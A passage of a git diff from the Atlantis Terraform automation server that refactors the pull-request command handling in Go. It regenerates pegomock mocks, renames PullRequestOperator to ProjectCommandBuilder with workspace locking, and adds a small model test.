 	return &CommitStatusUpdater_Update_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
@@ -73,12 +73,12 @@ type CommitStatusUpdater_Update_OngoingVerification struct {
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, *events.Command) {
-	repo, pull, status, cmd := c.GetAllCapturedArguments()
-	return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], cmd[len(cmd)-1]
+func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, events.CommandName) {
+	repo, pull, status, command := c.GetAllCapturedArguments()
+	return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], command[len(command)-1]
 }
 
-func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []*events.Command) {
+func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []events.CommandName) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]models.Repo, len(params[0]))
@@ -93,16 +93,16 @@ func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments
 		for u, param := range params[2] {
 			_param2[u] = param.(vcs.CommitStatus)
 		}
-		_param3 = make([]*events.Command, len(params[3]))
+		_param3 = make([]events.CommandName, len(params[3]))
 		for u, param := range params[3] {
-			_param3[u] = param.(*events.Command)
+			_param3[u] = param.(events.CommandName)
 		}
 	}
 	return
 }
 
-func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification {
-	params := []pegomock.Param{ctx, res}
+func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification {
+	params := []pegomock.Param{ctx, commandName, res}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "UpdateProjectResult", params)
 	return &CommitStatusUpdater_UpdateProjectResult_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
@@ -112,21 +112,25 @@ type CommitStatusUpdater_UpdateProjectResult_OngoingVerification struct {
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandResponse) {
-	ctx, res := c.GetAllCapturedArguments()
-	return ctx[len(ctx)-1], res[len(res)-1]
+func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandName, events.CommandResult) {
+	ctx, commandName, res := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1], commandName[len(commandName)-1], res[len(res)-1]
 }
 
-func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandResponse) {
+func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandName, _param2 []events.CommandResult) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]*events.CommandContext, len(params[0]))
 		for u, param := range params[0] {
 			_param0[u] = param.(*events.CommandContext)
 		}
-		_param1 = make([]events.CommandResponse, len(params[1]))
+		_param1 = make([]events.CommandName, len(params[1]))
 		for u, param := range params[1] {
-			_param1[u] = param.(events.CommandResponse)
+			_param1[u] = param.(events.CommandName)
+		}
+		_param2 = make([]events.CommandResult, len(params[2]))
+		for u, param := range params[2] {
+			_param2[u] = param.(events.CommandResult)
 		}
 	}
 	return
diff --git a/server/events/mocks/mock_event_parsing.go b/server/events/mocks/mock_event_parsing.go
index 007f823a40..1c1feaf31c 100644
--- a/server/events/mocks/mock_event_parsing.go
+++ b/server/events/mocks/mock_event_parsing.go
@@ -44,12 +44,13 @@ func (mock *MockEventParsing) ParseGithubIssueCommentEvent(comment *github.Issue
 	return ret0, ret1, ret2, ret3
 }
 
-func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) {
+func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error) {
 	params := []pegomock.Param{pull}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 models.PullRequest
 	var ret1 models.Repo
-	var ret2 error
+	var ret2 models.Repo
+	var ret3 error
 	if len(result) != 0 {
 		if result[0] != nil {
 			ret0 = result[0].(models.PullRequest)
@@ -58,10 +59,41 @@ func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.
 			ret1 = result[1].(models.Repo)
 		}
 		if result[2] != nil {
-			ret2 = result[2].(error)
+			ret2 = result[2].(models.Repo)
+		}
+		if result[3] != nil {
+			ret3 = result[3].(error)
+		}
+	}
+	return ret0, ret1, ret2, ret3
+}
+
+func (mock *MockEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
+	params := []pegomock.Param{pullEvent}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPullEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 models.PullRequest
+	var ret1 models.Repo
+	var ret2 models.Repo
+	var ret3 models.User
+	var ret4 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(models.PullRequest)
+		}
+		if result[1] != nil {
+			ret1 = result[1].(models.Repo)
+		}
+		if result[2] != nil {
+			ret2 = result[2].(models.Repo)
+		}
+		if result[3] != nil {
+			ret3 = result[3].(models.User)
+		}
+		if result[4] != nil {
+			ret4 = result[4].(error)
 		}
 	}
-	return ret0, ret1, ret2
+	return ret0, ret1, ret2, ret3, ret4
 }
 
 func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) {
@@ -80,13 +112,14 @@ func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models
 	return ret0, ret1
 }
 
-func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) {
+func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
 	params := []pegomock.Param{event}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 models.PullRequest
 	var ret1 models.Repo
 	var ret2 models.Repo
-	var ret3 error
+	var ret3 models.User
+	var ret4 error
 	if len(result) != 0 {
 		if result[0] != nil {
 			ret0 = result[0].(models.PullRequest)
@@ -98,10 +131,13 @@ func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent)
 			ret2 = result[2].(models.Repo)
 		}
 		if result[3] != nil {
-			ret3 = result[3].(error)
+			ret3 = result[3].(models.User)
+		}
+		if result[4] != nil {
+			ret4 = result[4].(error)
 		}
 	}
-	return ret0, ret1, ret2, ret3
+	return ret0, ret1, ret2, ret3, ret4
 }
 
 func (mock *MockEventParsing) ParseGitlabMergeCommentEvent(event go_gitlab.MergeCommentEvent) (models.Repo, models.Repo, models.User, error) {
@@ -212,6 +248,33 @@ func (c *EventParsing_ParseGithubPull_OngoingVerification) GetAllCapturedArgumen
 	return
 }
 
+func (verifier *VerifierEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) *EventParsing_ParseGithubPullEvent_OngoingVerification {
+	params := []pegomock.Param{pullEvent}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubPullEvent", params)
+	return &EventParsing_ParseGithubPullEvent_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type EventParsing_ParseGithubPullEvent_OngoingVerification struct {
+	mock              *MockEventParsing
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetCapturedArguments() *github.PullRequestEvent {
+	pullEvent := c.GetAllCapturedArguments()
+	return pullEvent[len(pullEvent)-1]
+}
+
+func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetAllCapturedArguments() (_param0 []*github.PullRequestEvent) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*github.PullRequestEvent, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*github.PullRequestEvent)
+		}
+	}
+	return
+}
+
 func (verifier *VerifierEventParsing) ParseGithubRepo(ghRepo *github.Repository) *EventParsing_ParseGithubRepo_OngoingVerification {
 	params := []pegomock.Param{ghRepo}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubRepo", params)
diff --git a/server/events/mocks/mock_executor.go b/server/events/mocks/mock_executor.go
index f3c9ce749b..208f43050e 100644
--- a/server/events/mocks/mock_executor.go
+++ b/server/events/mocks/mock_executor.go
@@ -18,13 +18,13 @@ func NewMockExecutor() *MockExecutor {
 	return &MockExecutor{fail: pegomock.GlobalFailHandler}
 }
 
-func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResponse {
+func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResult {
 	params := []pegomock.Param{ctx}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
-	var ret0 events.CommandResponse
+	result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResult)(nil)).Elem()})
+	var ret0 events.CommandResult
 	if len(result) != 0 {
 		if result[0] != nil {
-			ret0 = result[0].(events.CommandResponse)
+			ret0 = result[0].(events.CommandResult)
 		}
 	}
 	return ret0
diff --git a/server/events/mocks/mock_project_command_builder.go b/server/events/mocks/mock_project_command_builder.go
new file mode 100644
index 0000000000..f779acab36
--- /dev/null
+++ b/server/events/mocks/mock_project_command_builder.go
@@ -0,0 +1,175 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectCommandBuilder)
+
+package mocks
+
+import (
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+	events "github.com/runatlantis/atlantis/server/events"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockProjectCommandBuilder struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectCommandBuilder() *MockProjectCommandBuilder {
+	return &MockProjectCommandBuilder{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) ([]models.ProjectCommandContext, error) {
+	params := []pegomock.Param{ctx}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("BuildAutoplanCommands", params, []reflect.Type{reflect.TypeOf((*[]models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 []models.ProjectCommandContext
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].([]models.ProjectCommandContext)
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) {
+	params := []pegomock.Param{ctx, commentCommand}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("BuildPlanCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 models.ProjectCommandContext
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(models.ProjectCommandContext)
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) {
+	params := []pegomock.Param{ctx, commentCommand}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("BuildApplyCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 models.ProjectCommandContext
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(models.ProjectCommandContext)
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalledOnce() *VerifierProjectCommandBuilder {
+	return &VerifierProjectCommandBuilder{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectCommandBuilder {
+	return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectCommandBuilder {
+	return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectCommandBuilder struct {
+	mock                   *MockProjectCommandBuilder
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification {
+	params := []pegomock.Param{ctx}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildAutoplanCommands", params)
+	return &ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification struct {
+	mock              *MockProjectCommandBuilder
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetCapturedArguments() *events.CommandContext {
+	ctx := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*events.CommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*events.CommandContext)
+		}
+	}
+	return
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification {
+	params := []pegomock.Param{ctx, commentCommand}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildPlanCommand", params)
+	return &ProjectCommandBuilder_BuildPlanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildPlanCommand_OngoingVerification struct {
+	mock              *MockProjectCommandBuilder
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) {
+	ctx, commentCommand := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*events.CommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*events.CommandContext)
+		}
+		_param1 = make([]*events.CommentCommand, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.(*events.CommentCommand)
+		}
+	}
+	return
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification {
+	params := []pegomock.Param{ctx, commentCommand}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildApplyCommand", params)
+	return &ProjectCommandBuilder_BuildApplyCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildApplyCommand_OngoingVerification struct {
+	mock              *MockProjectCommandBuilder
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) {
+	ctx, commentCommand := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*events.CommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*events.CommandContext)
+		}
+		_param1 = make([]*events.CommentCommand, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.(*events.CommentCommand)
+		}
+	}
+	return
+}
diff --git a/server/events/mocks/mock_pull_request_operator.go b/server/events/mocks/mock_pull_request_operator.go
deleted file mode 100644
index 443636863a..0000000000
--- a/server/events/mocks/mock_pull_request_operator.go
+++ /dev/null
@@ -1,154 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: PullRequestOperator)
-
-package mocks
-
-import (
-	"reflect"
-
-	pegomock "github.com/petergtz/pegomock"
-	events "github.com/runatlantis/atlantis/server/events"
-)
-
-type MockPullRequestOperator struct {
-	fail func(message string, callerSkip ...int)
-}
-
-func NewMockPullRequestOperator() *MockPullRequestOperator {
-	return &MockPullRequestOperator{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockPullRequestOperator) Autoplan(ctx *events.CommandContext) events.CommandResponse {
-	params := []pegomock.Param{ctx}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("Autoplan", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
-	var ret0 events.CommandResponse
-	if len(result) != 0 {
-		if result[0] != nil {
-			ret0 = result[0].(events.CommandResponse)
-		}
-	}
-	return ret0
-}
-
-func (mock *MockPullRequestOperator) PlanViaComment(ctx *events.CommandContext) events.CommandResponse {
-	params := []pegomock.Param{ctx}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("PlanViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
-	var ret0 events.CommandResponse
-	if len(result) != 0 {
-		if result[0] != nil {
-			ret0 = result[0].(events.CommandResponse)
-		}
-	}
-	return ret0
-}
-
-func (mock *MockPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) events.CommandResponse {
-	params := []pegomock.Param{ctx}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("ApplyViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
-	var ret0 events.CommandResponse
-	if len(result) != 0 {
-		if result[0] != nil {
-			ret0 = result[0].(events.CommandResponse)
-		}
-	}
-	return ret0
-}
-
-func (mock *MockPullRequestOperator) VerifyWasCalledOnce() *VerifierPullRequestOperator {
-	return &VerifierPullRequestOperator{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockPullRequestOperator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullRequestOperator {
-	return &VerifierPullRequestOperator{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockPullRequestOperator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullRequestOperator {
-	return &VerifierPullRequestOperator{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierPullRequestOperator struct {
-	mock                   *MockPullRequestOperator
-	invocationCountMatcher pegomock.Matcher
-	inOrderContext         *pegomock.InOrderContext
-}
-
-func (verifier *VerifierPullRequestOperator) Autoplan(ctx *events.CommandContext) *PullRequestOperator_Autoplan_OngoingVerification {
-	params := []pegomock.Param{ctx}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Autoplan", params)
-	return &PullRequestOperator_Autoplan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type PullRequestOperator_Autoplan_OngoingVerification struct {
-	mock              *MockPullRequestOperator
-	methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *PullRequestOperator_Autoplan_OngoingVerification) GetCapturedArguments() *events.CommandContext {
-	ctx := c.GetAllCapturedArguments()
-	return ctx[len(ctx)-1]
-}
-
-func (c *PullRequestOperator_Autoplan_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
-	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
-	if len(params) > 0 {
-		_param0 = make([]*events.CommandContext, len(params[0]))
-		for u, param := range params[0] {
-			_param0[u] = param.(*events.CommandContext)
-		}
-	}
-	return
-}
-
-func (verifier *VerifierPullRequestOperator) PlanViaComment(ctx *events.CommandContext) *PullRequestOperator_PlanViaComment_OngoingVerification {
-	params := []pegomock.Param{ctx}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PlanViaComment", params)
-	return &PullRequestOperator_PlanViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type PullRequestOperator_PlanViaComment_OngoingVerification struct {
-	mock              *MockPullRequestOperator
-	methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext {
-	ctx := c.GetAllCapturedArguments()
-	return ctx[len(ctx)-1]
-}
-
-func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
-	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
-	if len(params) > 0 {
-		_param0 = make([]*events.CommandContext, len(params[0]))
-		for u, param := range params[0] {
-			_param0[u] = param.(*events.CommandContext)
-		}
-	}
-	return
-}
-
-func (verifier *VerifierPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) *PullRequestOperator_ApplyViaComment_OngoingVerification {
-	params := []pegomock.Param{ctx}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ApplyViaComment", params)
-	return &PullRequestOperator_ApplyViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type PullRequestOperator_ApplyViaComment_OngoingVerification struct {
-	mock              *MockPullRequestOperator
-	methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext {
-	ctx := c.GetAllCapturedArguments()
-	return ctx[len(ctx)-1]
-}
-
-func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
-	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
-	if len(params) > 0 {
-		_param0 = make([]*events.CommandContext, len(params[0]))
-		for u, param := range params[0] {
-			_param0[u] = param.(*events.CommandContext)
-		}
-	}
-	return
-}
diff --git a/server/events/models/models_test.go b/server/events/models/models_test.go
index 0dbb4f49ff..5883f21936 100644
--- a/server/events/models/models_test.go
+++ b/server/events/models/models_test.go
@@ -92,3 +92,10 @@ func TestNewRepo_HTTPSAuth(t *testing.T) {
 		Name:              "repo",
 	}, repo)
 }
+
+func TestProject_String(t *testing.T) {
+	Equals(t, "repofullname=owner/repo path=my/path", (models.Project{
+		RepoFullName: "owner/repo",
+		Path:         "my/path",
+	}).String())
+}
diff --git a/server/events/pull_request_operator.go b/server/events/project_command_builder.go
similarity index 62%
rename from server/events/pull_request_operator.go
rename to server/events/project_command_builder.go
index fabad33d0f..90f2324dd8 100644
--- a/server/events/pull_request_operator.go
+++ b/server/events/project_command_builder.go
@@ -15,41 +15,45 @@ import (
 	"github.com/runatlantis/atlantis/server/logging"
 )
 
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_request_operator.go PullRequestOperator
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_command_builder.go ProjectCommandBuilder
 
-type PullRequestOperator interface {
-	Autoplan(ctx *CommandContext) CommandResponse
-	PlanViaComment(ctx *CommandContext) CommandResponse
-	ApplyViaComment(ctx *CommandContext) CommandResponse
+type ProjectCommandBuilder interface {
+	BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error)
+	BuildPlanCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error)
+	BuildApplyCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error)
 }
 
-type DefaultPullRequestOperator struct {
-	TerraformExecutor TerraformExec
-	DefaultTFVersion  *version.Version
-	ParserValidator   *yaml.ParserValidator
-	ProjectFinder     ProjectFinder
-	VCSClient         vcs.ClientProxy
-	Workspace         AtlantisWorkspace
-	ProjectOperator   ProjectOperator
+type DefaultProjectCommandBuilder struct {
+	ParserValidator         *yaml.ParserValidator
+	ProjectFinder           ProjectFinder
+	VCSClient               vcs.ClientProxy
+	Workspace               AtlantisWorkspace
+	AtlantisWorkspaceLocker AtlantisWorkspaceLocker
 }
 
 type TerraformExec interface {
 	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
 }
 
-func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse {
-	// check out repo to parse atlantis.yaml
-	// this will check out the repo to a * dir
-	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
+func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) {
+	// Need to lock the workspace we're about to clone to.
+	workspace := DefaultWorkspace
+	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num)
 	if err != nil {
-		return CommandResponse{Error: err}
+		return nil, err
+	}
+	defer unlockFn()
+
+	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, workspace)
+	if err != nil {
+		return nil, err
 	}
 
 	// Parse config file if it exists.
 	ctx.Log.Debug("parsing config file")
 	config, err := p.ParserValidator.ReadConfig(repoDir)
 	if err != nil && !os.IsNotExist(err) {
-		return CommandResponse{Error: err}
+		return nil, err
 	}
 	noAtlantisYAML := os.IsNotExist(err)
 	if noAtlantisYAML {
@@ -61,11 +65,11 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 	// We'll need the list of modified files.
 	modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
 	if err != nil {
-		return CommandResponse{Error: err}
+		return nil, err
 	}
 	ctx.Log.Debug("%d files were modified in this pull request", len(modifiedFiles))
 
-	// Prepare the project contexts so the ProjectOperator can execute.
+	// Prepare the project contexts so the ProjectCommandRunner can execute.
